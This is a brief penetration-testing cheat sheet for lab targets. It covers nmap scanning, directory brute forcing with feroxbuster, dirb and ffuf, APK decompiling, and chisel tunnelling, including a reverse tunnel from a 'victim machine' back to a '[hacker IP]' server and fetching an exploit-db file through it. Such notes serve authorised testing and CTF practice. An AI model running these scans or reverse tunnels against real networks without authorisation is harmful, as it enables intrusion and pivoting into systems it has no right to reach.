# Tools & Cheat Sheet

## Nmap 

```
nmap -p- -T5 --min-rate=1000 10.10.10.239 -oG fkclai.nmap
nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.239 -o nmap-result.txt
```

## Directory Brute Force

```
feroxbuster -u http:///pikatwoo.pokatmon.htb -x php

dirb http://10.10.10.239/ /usr/share/wordlists/dirb/common.txt -o dirb-239.result

ffuf -u http://10.10.11.199:8080/v1/AUTH_andrew/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -mc all -ac

```

##  APK Analysis

<pre><code><strong># Static APK Analysis
</strong><strong>
</strong><strong>apktool d mobile-app.apk
</strong>//Check the AndroidManifest.xml

# Configure
</code></pre>

## HTTP Tunnel&#x20;

### Chisel&#x20;

Source: <https://github.com/jpillora/chisel.git>

<https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html>

1. #### Reverse Tunneling

```
 
// Hacker Machine
// setup a reverse server and listen the port 12345
./chisel server -p 12345 --reverse


//Victim Machine
// Listen on hacker 1337, forward to dump host ip on port 8000
./chisel client [hacker IP]:12345 R:1337:[dump host ip]:8000

// Hacker Machine
http://localhost:1337/ => http://[dump host ip]:8000



```

2. TCP basic tunneling

```
// Chisel server 1.1.1.1
./chisel server -p 1234

// Chisel Client 2.2.2.2 port 1337
./chisel client 1.1.1.1:1234 1337:www.exploit-db.com:443
wget https://localhost:9001/raw/45782

```